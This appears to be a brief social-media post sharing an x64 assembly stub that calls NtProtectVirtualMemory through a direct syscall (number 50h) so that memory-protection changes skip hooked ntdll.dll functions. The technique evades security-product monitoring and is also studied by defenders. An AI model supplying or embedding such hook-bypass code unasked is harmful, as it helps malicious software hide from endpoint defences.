1 か月前 · Jul 20, 2026 7:07 PM
Bypassing userland hooks on VirtualProtect by executing syscalls directly:
ASM
.code
; NTSTATUS Syscall_NtProtectVirtualMemory(HANDLE ProcessHandle, PVOID* BaseAddress, PSIZE_T RegionSize, ULONG NewProtect, PULONG OldProtect)
Syscall_NtProtectVirtualMemory proc
mov r10, rcx ; Syscall convention moves RCX -> R10
mov eax, 50h ; Syscall number for NtProtectVirtualMemory (Win 10/11)
syscall
ret
Syscall_NtProtectVirtualMemory endp
endExecutes kernel transition directly without jumping through hooked ntdll.dll stub!